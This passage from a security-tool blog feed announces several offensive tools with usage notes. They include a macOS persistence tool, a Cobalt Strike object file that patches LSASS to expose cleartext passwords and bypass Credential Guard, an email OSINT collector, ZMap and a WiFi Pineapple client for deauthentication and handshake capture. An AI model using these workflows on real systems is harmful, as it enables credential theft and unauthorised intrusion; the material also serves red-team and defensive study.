/> } ` } { |: | _______ __<br /> } } } { |::.| | _ .-----.-----| |-----.<br /> } ` } { `---' |. | | | | | | | -__|<br />.-'"~" '-. |. _ | __| __|__|_____|<br />'. .' |: | |__| |__|<br /> '-_.._-' |::.|:. |<br /> `--- ---' v0.2.0<br /><br />+--------------------+<br />| AtJob |<br />+--------------------+<br />| Bashrc |<br />+--------------------+<br />| Cron |<br />+--------------------+<br />| CronRoot |<br />+--------------------+<br />| Emond |<br />+--------------------+<br />| LaunchAgent |<br />+--------------------+<br />| LaunchAgentUser |<br />+--------------------+<br />| LaunchDaemon |<br />+--- -----------------+<br />| LoginHook |<br />+--------------------+<br />| LoginHookUser |<br />+--------------------+<br />| LoginItem |<br />+--------------------+<br />| LogoutHook |<br />+--------------------+<br />| LogoutHookUser |<br />+--------------------+<br />| Periodic |<br />+--------------------+<br />| Reopen |<br />+--------------------+<br />| Zshrc |<br />+--------------------+<br /></code></pre> <p>Apply a persistence mechanism:</p> <pre><code>$ poisonapple -t LaunchAgentUser -n testing<br /> , _______ __<br /> .-.:|.-. | _ .-----|__|-----.-----.-----.<br />.' '. |. | | | | |__ --| | | | |<br />'-."~". .-' |. ____|_____|__|_____|_____|__|__|<br /> } ` } { |: | _______ __<br /> } } } { |::.| | _ .-----.-----| |-----.<br /> } ` } { `---' |. | | | | | | | -__|<br />.-'"~" '-. |. _ | __| __|__|_____|<br />'. .' |: | |__| |__|<br /> '-_.._-' |::.|:. |<br /> `--- ---' v0.2.0<br /><br />[+] Success! The persistence mechanism action was successful: LaunchAgentUser<br /></code></pre> <p>If no command is specified (-c) a default trigger command will be used which writes to a file on the <a href="https://www.kitploit.com/search/label/Desktop" target="_blank" title="Desktop">Desktop</a> every time the persistence mechanism is triggered:</p> <pre><code>$ cat ~/Desktop/PoisonApple-LaunchAgentUser<br />Triggered @ Tue Mar 23 17:46:02 CDT 2021 <br />Triggered @ Tue Mar 23 17:46:13 CDT 2021 <br />Triggered @ Tue Mar 23 17:46:23 CDT 2021 <br />Triggered @ Tue Mar 23 17:46:33 CDT 2021 <br />Triggered @ Tue Mar 23 17:46:43 CDT 2021 <br />Triggered @ Tue Mar 23 17:46:53 CDT 2021 <br />Triggered @ Tue Mar 23 17:47:03 CDT 2021 <br />Triggered @ Tue Mar 23 17:47:13 CDT 2021 <br />Triggered @ Tue Mar 23 17:48:05 CDT 2021 <br />Triggered @ Tue Mar 23 17:48:15 CDT 2021<br /></code></pre> <p>Remove a persistence mechanism:</p> <pre><code>$ poisonapple -t LaunchAgentUser -n <a href="https://www.kitploit.com/search/label/Testing" target="_blank" title="testing">testing</a> -r<br />...<br /></code></pre> <p>Use a custom command:</p> <pre><code>$ poisonapple -t LaunchAgentUser -n foo -c "echo foo >> /Users/user/Desktop/foo"<br />...<br /></code></pre> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/CyborgSecurity/PoisonApple" rel="nofollow" target="_blank" title="Download PoisonApple">Download PoisonApple</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-71438683368923322122021-02-28T17:30:00.015-03:002021-02-28T17:30:05.263-03:00WdToggle - A Beacon Object File (BOF) For Cobalt Strike Which Uses Direct System Calls To Enable WDigest Credential Caching<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-VDUSQhlaWUk/YDSYlbe1orI/AAAAAAAAVcw/wJgwsKPumsU5NZ3v0UlgAFyLJimv1NNBgCNcBGAsYHQ/s767/WdToggle_1_WdToggle.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="767" data-original-width="543" src="https://1.bp.blogspot.com/-VDUSQhlaWUk/YDSYlbe1orI/AAAAAAAAVcw/wJgwsKPumsU5NZ3v0UlgAFyLJimv1NNBgCNcBGAsYHQ/s16000/WdToggle_1_WdToggle.png" /></a></div><p><br /></p> <p>A Proof of Concept <a href="https://www.kitploit.com/search/label/Cobalt%20Strike" target="_blank" title="Cobalt Strike">Cobalt Strike</a> Beacon Object File which uses <a href="https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/" rel="nofollow" target="_blank" title="direct system calls">direct system calls</a> to enable <strong>WDigest</strong> credential caching and circumvent <strong>Credential Guard</strong> (if enabled).</p> <p>Additional guidance can be found in this blog post: <a href="https://outflank.nl/blog/?p=1592" rel="nofollow" target="_blank" title="https://outflank.nl/blog/?p=1592">https://outflank.nl/blog/?p=1592</a></p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Background</b></span><br /> <p>This PoC code is based on the following excellent blog posts:</p> <p><a href="https://blog.xpnsec.com/exploring-mimikatz-part-1/" rel="nofollow" target="_blank" title="Exploring Mimikatz - Part 1 - WDigest">Exploring Mimikatz - Part 1 - WDigest</a></p> <p><a href="https://teamhydra.blog/2020/08/25/bypassing-credential-guard/" rel="nofollow" target="_blank" title="Bypassing Credential Guard">Bypassing Credential Guard</a></p> <p>Utilizing direct systems calls via inline assembly in BOF code provides a more opsec safe way of interacting with the LSASS process. Using direct system calls avoids AV/EDR software intercepting user-mode API calls.</p> <p>Visual Studio (C++) does not support inline assembly for x64 processors. So in order to write a single Beacon Object File containing our compiled / assembled code code we must use the <a href="http://mingw-w64.org" rel="nofollow" target="_blank" title="Mingw-w64">Mingw-w64</a> (GCC for Windows) compiler.</p> <br /><span style="font-size: large;"><b>What is this repository for?</b></span><br /> <ul> <li>Demonstrate the usage of direct systems calls using inline-assembly to provide a more opsec safe way of interacting with the LSASS process.</li> <li>Enable <strong>WDigest</strong> credential caching by toggling the <code>g_fParameter_UseLogonCredential</code> global parameter to 1 within the LSASS process (wdigest.dll module).</li> <li>Circumventing <strong>Credential Guard</strong> (if enabled) by toggling the <code>g_IsCredGuardEnabled</code> variable to 0 within the LSASS process (wdigest.dll module).</li> <li>Execute this code within the Beacon process using a <a href="https://www.cobaltstrike.com/help-beacon-object-files" rel="nofollow" target="_blank" title="Beacon object file">Beacon object file</a>.</li> </ul> <br /><span style="font-size: large;"><b>How do I set this up?</b></span><br /> <p>We will not supply compiled binaries. You will have to do this yourself:</p> <ul> <li> <p>Clone this repository.</p> </li> <li> <p>Make sure you have the Mingw-w64 compiler installed. On Mac OSX for example, we can use the ports collection to install Mingw-w64 (<code>sudo port install mingw-w64</code>).</p> </li> <li> <p>Run the <code>make</code> command to compile the Beacon object file.</p> </li> <li> <p>Within a Cobaltstrike beacon context run the <code>inline-execute</code> command and provide the path to the object <code>WdToggle.o</code> file.</p> </li> <li><p><br /></p></li><li> <p>Run the Cobaltstrike <code>logonpasswords</code> command (Mimikatz) and notice that clear text <a href="https://www.kitploit.com/search/label/Passwords" target="_blank" title="passwords">passwords</a> are enabled again for new user logins or users who <strong>unlock</strong> their desktop session.</p> <p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-S3N7dcv6Skg/YDSYsSVpvUI/AAAAAAAAVc0/SznQiTKQA9cCen2qIysM7BrfyIMyDpzAQCNcBGAsYHQ/s767/WdToggle_1_WdToggle.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="767" data-original-width="543" src="https://1.bp.blogspot.com/-S3N7dcv6Skg/YDSYsSVpvUI/AAAAAAAAVc0/SznQiTKQA9cCen2qIysM7BrfyIMyDpzAQCNcBGAsYHQ/s16000/WdToggle_1_WdToggle.png" /></a></div><br /><p></p></li></ul><span style="font-size: large;"><b>Limitations</b></span><br /> <ul> <li>This memory patch is not reboot persistent, so after a reboot you must rerun the code.</li> <li>The memory offset to the <code>wdigest!g_fParameter_UseLogonCredential</code> and <code>wdigest!g_IsCredGuardEnabled</code> global variable could change between Windows versions and revisions. We provided some offsets for different builds, but these can change in future releases. You can add your own version offsets which can be found using the Windows debugger tools.</li> </ul> <pre><code>C:\Program Files (x86)\Windows Kits\10\Debuggers\x64>cdb.exe -z C:\Windows\System32\wdigest.dll<br /><br />0:000>x wdigest!g_fParameter_UseLogonCredential<br />00000001`800361b4 wdigest!g_fParameter_UseLogonCredential = <no type information><br />0:000> x wdigest!g_IsCredGuardEnabled<br />00000001`80035c08 wdigest!g_IsCredGuardEnabled = <no type information><br />0:000><br /></code></pre> <br /><span style="font-size: large;"><b>Detection</b></span><br /> <p>To detect credential theft through LSASS memory access, we could use a tool like <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon" rel="nofollow" target="_blank" title="Sysmon">Sysmon</a>. Sysmon can be configured to log processes opening a handle to the lsass.exe process. With this configuration applied, we can gather telemetry for suspicious processes accessing the LSASS process and help detecting possible credential dumping activity. Of course, there are more options to detect credential theft, for example using an advanced detection platform like <a href="https://www.kitploit.com/search/label/Windows%20Defender" target="_blank" title="Windows Defender">Windows Defender</a> ATP. But if you don’t have the budget and luxury of using these platforms, then Sysmon is that free tool that can help to fill up the gap.</p> <br /><span style="font-size: large;"><b>Credits</b></span><br /> <ul> <li>The assembly code used within this tool is based on the assembly output from the <a href="https://github.com/jthuraisamy/SysWhispers" rel="nofollow" target="_blank" title="SysWhispers">SysWhispers</a> tool from <a href="https://twitter.com/Jackson_T" rel="nofollow" target="_blank" title="@Jackson_T">@Jackson_T</a>.</li> <li>Adam Chester <a href="https://twitter.com/_xpn_" rel="nofollow" target="_blank" title="@_xpn_">@_xpn_</a></li> <li>N4kedTurtle from <a href="https://teamhydra.blog" rel="nofollow" target="_blank" title="Team Hydra">Team Hydra</a></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/outflanknl/WdToggle" rel="nofollow" target="_blank" title="Download WdToggle">Download WdToggle</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-75790936856663238902021-02-13T17:30:00.001-03:002021-02-13T17:30:09.579-03:00Project iKy v2.7.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Nbh_UpDzFos/XoDcPeWj8DI/AAAAAAAASH8/3XczI023lo4xtaLGWZtm1cdnZ__OiB-HQCNcBGAsYHQ/s1600/iky.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="853" height="360" src="https://1.bp.blogspot.com/-Nbh_UpDzFos/XoDcPeWj8DI/AAAAAAAASH8/3XczI023lo4xtaLGWZtm1cdnZ__OiB-HQCNcBGAsYHQ/s640/iky.gif" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<div style="text-align: justify;">
Project iKy is a tool that collects information from an email and shows results in a nice visual interface.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Visit the Gitlab Page of the <a href="https://kennbroorg.gitlab.io/ikyweb/" rel="nofollow noreferrer noopener" target="_blank">Project</a></div>
</div>
<a name='more'></a><br />
<div>
<h2>
Installation</h2>
<div style="text-align: justify;">
<h3 style="text-align: start;">
Clone repository</h3>
<pre><code>git clone https://gitlab.com/kennbroorg/iKy.git</code></pre>
<h3 style="text-align: start;">
Install Backend</h3>
<h4 style="text-align: start;">
Redis</h4>
<div style="text-align: start;">
You must install Redis</div>
<pre><code>wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install</code></pre>
<h4 style="text-align: start;">
Python stuff and Celery</h4>
<div style="text-align: start;">
You must install the libraries inside requirements.txt</div>
<pre><code>python3 <span class="nt">-m</span> pip <span class="nb">install</span> <span class="nt">-r</span> requirements.txt</code></pre>
<h3 style="text-align: start;">
Install Frontend</h3>
<h4 style="text-align: start;">
Node</h4>
<div style="text-align: start;">
First of all, install <a href="https://nodejs.org/en/" rel="nofollow noreferrer noopener" target="_blank">nodejs</a>.</div>
<h4 style="text-align: start;">
Dependencias</h4>
<div style="text-align: start;">
Inside the directory <strong>frontend</strong> install the dependencies</div>
<pre><code><span class="nb">cd </span>frontend</code></pre>
</div>
</div>
npm <span class="nb">install</span>
<br />
<h2 style="text-align: start;">
Wake up iKy Tool</h2>
<h3 style="text-align: start;">
Turn on Backend</h3>
<h4 style="text-align: start;">
Redis</h4>
<div style="text-align: start;">
Turn on the server in a terminal</div>
<pre><code>redis-server</code></pre>
<h4 style="text-align: start;">
Python stuff and Celery</h4>
<div style="text-align: start;">
Turn on Celery in another terminal, within the directory <strong>backend</strong></div>
<pre><code>./celery.sh</code></pre>
<div style="text-align: start;">
Again, in another terminal turn on backend app from directory <strong>backend</strong></div>
<pre><code>python3 app.py</code></pre>
<h3 style="text-align: start;">
Turn on Frontend</h3>
<div style="text-align: start;">
Finally, to run frontend server, execute the following command from directory <strong>frontend</strong></div>
<pre><code>npm start</code></pre>
<br />
<h2>
Screen after turn on iKy</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-7o9lUITzUGM/XoDaosFIc0I/AAAAAAAASH0/Lk0MScYp0q8Vx2EbqANXe9w0-t2IIwfIgCNcBGAsYHQ/s1600/Screens1000.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="563" data-original-width="1000" height="360" src="https://1.bp.blogspot.com/-7o9lUITzUGM/XoDaosFIc0I/AAAAAAAASH0/Lk0MScYp0q8Vx2EbqANXe9w0-t2IIwfIgCNcBGAsYHQ/s640/Screens1000.png" width="640" /></a></div>
<br />
<h3>
Browser</h3>
<h3>
<div style="font-size: medium; font-weight: 400;">
Open the browser in this <a href="http://127.0.0.1:4200/" rel="nofollow noreferrer noopener" target="_blank">url</a></div>
</h3>
<h3>
Config API Keys</h3>
<h3>
<div style="font-size: medium; font-weight: 400;">
Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.</div>
<ul>
<li><span style="font-size: small;">Fullcontact: Generate the APIs from <a href="https://support.fullcontact.com/hc/en-us/articles/115003415888-Getting-Started-FullContact-v2-APIs" rel="nofollow noreferrer noopener" target="_blank">here</a></span></li>
<li><span style="font-size: small;">Twitter: Generate the APIs from <a href="https://developer.twitter.com/en/docs/basics/authentication/guides/access-tokens.html" rel="nofollow noreferrer noopener" target="_blank">here</a></span></li>
<li><span style="font-size: small;">Linkedin: Only the user and password of your account must be loaded</span></li>
<li><span style="font-size: small;">HaveIBeenPwned : Generate the APIs from <a href="https://haveibeenpwned.com/API/Key" rel="nofollow noreferrer noopener" target="_blank">here</a> (Paid)</span></li>
<li><span style="font-size: small;">Emailrep.io : Generate the APIs from <a href="https://emailrep.io/key" rel="nofollow noreferrer noopener" target="_blank">here</a></span></li>
</ul>
</h3>
<h1>
Wiki</h1>
<h3>
<ul>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/home"><span style="font-size: small;">iKy Wiki</span></a></li>
<li><a href="https://kennbroorg.gitlab.io/ikyweb/" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">iKy Page</span></a></li>
<li><span style="font-size: small;">Installation</span><ul>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Installation/EasyInstall"><span style="font-size: small;">Easy Install</span></a></li>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Installation/Vagrant"><span style="font-size: small;">Vagrant</span></a></li>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Installation/Manual-install-(Compacted)"><span style="font-size: small;">Manual install (Compacted)</span></a></li>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Installation/Manual-install-(Detailed)"><span style="font-size: small;">Manual install (Detailed)</span></a></li>
</ul>
</li>
<li><span style="font-size: small;">Update</span><ul>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Update/Soft"><span style="font-size: small;">Soft Update</span></a></li>
</ul>
</li>
<li><span style="font-size: small;">Wake Up</span><ul>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Wakeup/WakeUp"><span style="font-size: small;">Turn on the project</span></a></li>
</ul>
</li>
<li><span style="font-size: small;">APIs</span><ul>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/APIs/ApiKeys-through-the-browser"><span style="font-size: small;">APIs through frontend</span></a></li>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/APIs/APIs-through-the-backend"><span style="font-size: small;">APIs through backend</span></a></li>
</ul>
</li>
<li><span style="font-size: small;">Backend</span><ul>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Backend/Backend-through-url"><span style="font-size: small;">Backend through URL</span></a></li>
</ul>
</li>
<li><span style="font-size: small;">Videos</span><ul>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Videos/Installations"><span style="font-size: small;">Installation videos</span></a><ul>
<li><a href="https://vimeo.com/350877994" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">Installation in Kali 2019</span></a></li>
<li><a href="https://vimeo.com/347435255" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">Installation in ubuntu 18.04</span></a></li>
<li><a href="https://vimeo.com/332359273" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">Installation in ubuntu 16.04</span></a></li>
</ul>
</li>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Videos/Demos"><span style="font-size: small;">Demo videos</span></a><ul>
<li><a href="https://vimeo.com/397862772" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">iKy eko15</span></a></li>
<li><a href="https://vimeo.com/347085110" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">iKy version 2</span></a></li>
<li><a href="https://vimeo.com/349011105" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">Testing iKy with Emiliano</span></a></li>
<li><a href="https://vimeo.com/342843348" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">Testing iKy with Giba</span></a></li>
<li><a href="https://vimeo.com/326114716" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">iKy version 1</span></a></li>
<li><a href="https://vimeo.com/272495754" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">iKy version 0</span></a></li>
</ul>
</li>
</ul>
</li>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Disclaimer"><span style="font-size: small;">Disclaimer</span></a></li>
</ul>
</h3>
<div>
<br />
<br />
<h2>
Demo Videos</h2>
<div align="center">
<iframe allow="autoplay; fullscreen" allowfullscreen="" frameborder="0" height="360" src="https://player.vimeo.com/video/397862772" width="640"></iframe><br />
iKy eko15</div>
<div align="center">
<a href="https://vimeo.com/347085110" rel="nofollow noreferrer noopener" target="_blank"></a><br />
<iframe allow="autoplay; fullscreen" allowfullscreen="" frameborder="0" height="360" src="https://player.vimeo.com/video/347085110" width="640"></iframe><br />
iKy Version 2<br />
<br /></div>
<div align="center">
<iframe allow="autoplay; fullscreen" allowfullscreen="" frameborder="0" height="360" src="https://player.vimeo.com/video/349011105" width="640"></iframe><br />
Testing iKy with Emiliano<br />
<br /></div>
<div align="center">
<iframe allow="autoplay; fullscreen" allowfullscreen="" frameborder="0" height="360" src="https://player.vimeo.com/video/342843348" width="640"></iframe><br />
Testing iKy with Giba<br />
<br /></div>
<div align="center">
<iframe allow="autoplay; fullscreen" allowfullscreen="" frameborder="0" height="360" src="https://player.vimeo.com/video/326114716" width="640"></iframe><br />
iKy version 1<br />
<br /></div>
<div align="center">
<iframe allow="autoplay; fullscreen" allowfullscreen="" frameborder="0" height="360" src="https://player.vimeo.com/video/272495754" width="640"></iframe> </div><div align="center"> iKy version 0</div>
<br />
<h2>
Disclaimer</h2>
<div>
Anyone who contributes or contributed to the project, including me, is not responsible for the use of the tool (Neither the legal use nor the illegal use, nor the "other" use).</div>
<div>
Keep in mind that this software was initially written for a joke, then for educational purposes (to educate ourselves), and now the goal is to collaborate with the community making quality free software, and while the quality is not excellent (sometimes not even good) we strive to pursue excellence.</div>
<div>
Consider that all the information collected is free and available online, the tool only tries to discover, collect and display it. Many times the tool cannot even achieve its goal of discovery and collection. Please load the necessary APIs before remembering my mother. If even with the APIs it doesn't show "nice" things that you expect to see, try other e-mails before you remember my mother. If you still do not see the "nice" things you expect to see, you can create an issue, contact us by e-mail or by any of the RRSS, but keep in mind that my mother is neither the creator nor Contribute to the project.</div>
<div>
We do not refund your money if you are not satisfied. I hope you enjoy using the tool as much as we enjoy doing it. The effort was and is enormous (Time, knowledge, coding, tests, reviews, etc.) but we would do it again. Do not use the tool if you cannot read the instructions and / or this disclaimer clearly.</div>
<div>
By the way, for those who insist on remembering my mother, she died many years ago but I love her as if she were right here.</div>
<div>
<br /></div>
<div>
<br /></div>
</div>
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://gitlab.com/kennbroorg/iKy" rel="nofollow" target="_blank" title="Download Project iKy">Download Project iKy v2.7.0</a></span></b><br />
<b><br /></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-53874732933159566742021-01-23T08:30:00.001-03:002021-01-23T08:30:03.220-03:00Zmap - A Fast Single Packet Network Scanner Designed For Internet-wide Network Surveys<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-0RBqbOTe8FU/YAugth3BMuI/AAAAAAAAVDI/iMEHSsGgi7AHz_JawMIDFQEV40ricuSIgCNcBGAsYHQ/s741/zmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="594" data-original-width="741" height="513" src="https://1.bp.blogspot.com/-0RBqbOTe8FU/YAugth3BMuI/AAAAAAAAVDI/iMEHSsGgi7AHz_JawMIDFQEV40ricuSIgCNcBGAsYHQ/w640-h513/zmap.png" width="640" /></a></div><p><br /></p> <p>ZMap is a fast single packet network scanner designed for Internet-wide network surveys. On a typical <a href="https://www.kitploit.com/search/label/Desktop" target="_blank" title="desktop">desktop</a> computer with a gigabit <a href="https://www.kitploit.com/search/label/Ethernet" target="_blank" title="Ethernet">Ethernet</a> connection, ZMap is capable <a href="https://www.kitploit.com/search/label/Scanning" target="_blank" title="scanning">scanning</a> the entire public IPv4 address space in under 45 minutes. With a 10gigE connection and <a href="http://www.ntop.org/products/packet-capture/pf_ring/" rel="nofollow" target="_blank" title="PF_RING">PF_RING</a>, ZMap can scan the IPv4 address space in under 5 minutes.</p> <p>ZMap operates on GNU/Linux, Mac OS, and BSD. ZMap currently has fully implemented probe modules for TCP SYN scans, ICMP, DNS queries, UPnP, BACNET, and can send a large number of <a href="https://github.com/zmap/zmap/blob/master/examples/udp-probes/README" rel="nofollow" target="_blank" title="UDP probes">UDP probes</a>. If you are looking to do more involved scans, e.g., banner grab or TLS handshake, take a look at <a href="https://github.com/zmap/zgrab" rel="nofollow" target="_blank" title="ZGrab">ZGrab</a>, ZMap's sister project that performs stateful application-layer handshakes.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Installation</b></span><br /> <p>The latest stable release of ZMap is version 2.1.1 and supports Linux, macOS, and BSD. We recommend installing ZMap from HEAD rather than using a distro package manager.</p> <p><strong>Instructions on building ZMap from source</strong> can be found in <a href="https://github.com/zmap/zmap/blob/master/INSTALL.md" rel="nofollow" target="_blank" title="INSTALL">INSTALL</a>.</p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>A guide to using ZMap is found in our <a href="https://github.com/zmap/zmap/wiki" rel="nofollow" target="_blank" title="GitHub Wiki">GitHub Wiki</a>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/zmap/zmap" rel="nofollow" target="_blank" title="Download Zmap">Download Zmap</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-54485456094115032442021-01-14T17:30:00.013-03:002021-01-14T17:30:06.740-03:00Pineapple-MK7-REST-Client - WiFi Hacking Workflow With Pineapple Mark 7 API<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-bQbG8autjNA/X_uw36vnizI/AAAAAAAAU9U/q_hvPb64Zrck1ITtxbfigTAOO2XfMOzgACNcBGAsYHQ/s682/Pineapple-MK7-REST-Client_1_recon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="519" data-original-width="682" height="488" src="https://1.bp.blogspot.com/-bQbG8autjNA/X_uw36vnizI/AAAAAAAAU9U/q_hvPb64Zrck1ITtxbfigTAOO2XfMOzgACNcBGAsYHQ/w640-h488/Pineapple-MK7-REST-Client_1_recon.png" width="640" /></a></div><p><br /></p><span style="font-size: x-large;"><b>PINEAPPLE MK7 REST CLIENT</b></span><br /> <ul> <li>The leading rogue access point and WiFi <a href="https://www.kitploit.com/search/label/Pentest%20Toolkit" target="_blank" title="pentest toolkit">pentest toolkit</a> for close access operations.</li> <li>Passive and active attacks analyze <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> and misconfigured devices.</li> <li><strong>@<em>HAK5</em></strong></li> </ul> <blockquote> <p><strong>Author</strong>:: TW-D</p> <p><strong>Version</strong>:: 1.0.2</p> <p><strong>Copyright</strong>:: Copyright (c) 2021 TW-D</p> <p><strong>License</strong>:: Distributes under the same terms as Ruby</p> <p><strong>Doc</strong>:: <a href="https://docs.hak5.org/hc/en-us/articles/360049854174-WiFi-Pineapple-Mark-VII-REST-API" rel="nofollow" target="_blank" title="https://docs.hak5.org/hc/en-us/articles/360049854174-WiFi-Pineapple-Mark-VII-REST-API">https://docs.hak5.org/hc/en-us/articles/360049854174-WiFi-Pineapple-Mark-VII-REST-API</a></p> <p><strong>Requires</strong>:: ruby >= 2.7.0, rest-client 2.1.0 gem and Pineapple MK7 <a href="https://www.kitploit.com/search/label/Firmware" target="_blank" title="Firmware">Firmware</a> 1.0.1</p> <p><strong>Installation</strong>::</p> <ul> <li> <p>sudo apt-get install ruby ruby-dev</p> </li> <li> <p>sudo gem install rest-client</p></li></ul></blockquote><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Usage</b></span><br /> <p>See/edit/execute the files in the <strong><em>samples/</em></strong> folder</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-BESheKNua9o/X_uw_NI25xI/AAAAAAAAU9Y/pMu-20pIik0JEtFkTmbsq_2U4ecE2jjqgCNcBGAsYHQ/s682/Pineapple-MK7-REST-Client_1_recon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="519" data-original-width="682" height="488" src="https://1.bp.blogspot.com/-BESheKNua9o/X_uw_NI25xI/AAAAAAAAU9Y/pMu-20pIik0JEtFkTmbsq_2U4ecE2jjqgCNcBGAsYHQ/w640-h488/Pineapple-MK7-REST-Client_1_recon.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b>System Authentication accessors/method</b></span><br /> <div><pre><code>system = PineappleMK7::System.new()</code></pre></div> <pre><code>system.host = (string) "172.16.42.1"<br />system.host()<br />system.port = (string) "1471"<br />system.port()<br />system.mac = (string) "00:13:37:DD:EE:FF"<br />system.mac()<br />system.password = (string) "P@55w0rD"<br />system.login()<br /></code></pre> <p><strong>host()</strong>, <strong>port()</strong> and <strong>mac()</strong> accessors return string</p> <p><strong>login()</strong> method return boolean</p> <br /><span style="font-size: large;"><b>Modules</b></span><br /> <br /><b>Module Recon methods</b><br /> <div><pre><code>recon = PineappleMK7::Modules::Recon</code></pre></div> <pre><code>recon.startScan( (integer) time )<br />recon.getResults( (integer) scanID )<br />recon.deleteScan( (integer) scanID )<br /></code></pre> <p><strong>startScan</strong> method have <em>scanID()</em> submethod and return integer</p> <p><strong>getResults</strong> method have <em>APResults()</em>, <em>UnassociatedClientResults()</em> and <em>OutOfRangeClientResults()</em> submethods</p> <blockquote> <p><strong><em>APResults()</em></strong> submethod return array of objects where object have :</p> </blockquote> <pre><code>ssid()<br />bssid()<br />encryption()<br />hidden()<br />wps()<br />channel()<br />signal()<br />clients() -> client_mac(), ap_mac() and ap_channel()<br /></code></pre> <blockquote> <p><strong><em>UnassociatedClientResults()</em></strong> submethod return array of objects where object have :</p> </blockquote> <pre><code>client_mac()<br />ap_mac()<br />ap_channel()<br /></code></pre> <blockquote> <p><strong><em>OutOfRangeClientResults()</em></strong> submethod return array of objects where object have :</p> </blockquote> <pre><code>client_mac()<br />ap_mac()<br />ap_channel()<br /></code></pre> <br /><b>Module PineAP methods</b><br /> <div><pre><code>pineAP = PineappleMK7::Modules::PineAP</code></pre></div> <pre><code>pineAP.enable()<br />pineAP.startHandshakesCapture( (hash/object) ap )<br />pineAP.deauthAP( (string) bssid, (integer) channel, (array) clients )<br />pineAP.deauthClient( (string) bssid, (integer) channel, (string) mac )<br />pineAP.stopHandshakesCapture()<br />pineAP.getHandshakes()<br />pineAP.filterClient( (string "allow" or "deny") mode )<br />pineAP.filterSSID( (string "allow" or "deny") mode )<br />pineAP.addSSID( (string) ssid )<br />pineAP.clearPool()<br />pineAP.setRogue()<br />pineAP.getClients()<br />pineAP.disable()<br /></code></pre> <p><strong>getHandshakes()</strong> method have <em>handshakes()</em> submethod return array of objects where object have :</p> <pre><code>type()<br />bssid()<br /></code></pre> <p><strong>getClients()</strong> method return array of objects where object have :</p> <pre><code>mac()<br />ip()<br />hostname()<br />ssid()<br />tx_bytes()<br />rx_bytes()<br /></code></pre> <br /><b>Module Notifications method</b><br /> <div><pre><code>notifications = PineappleMK7::Modules::Notifications</code></pre></div> <pre><code>notifications.clearAll()<br /></code></pre> <br /><b>Module Download method</b><br /> <div><pre><code>download = PineappleMK7::Modules::Download</code></pre></div> <pre><code>download.handshake( (string) bssid, (string) type, (string) destination )<br 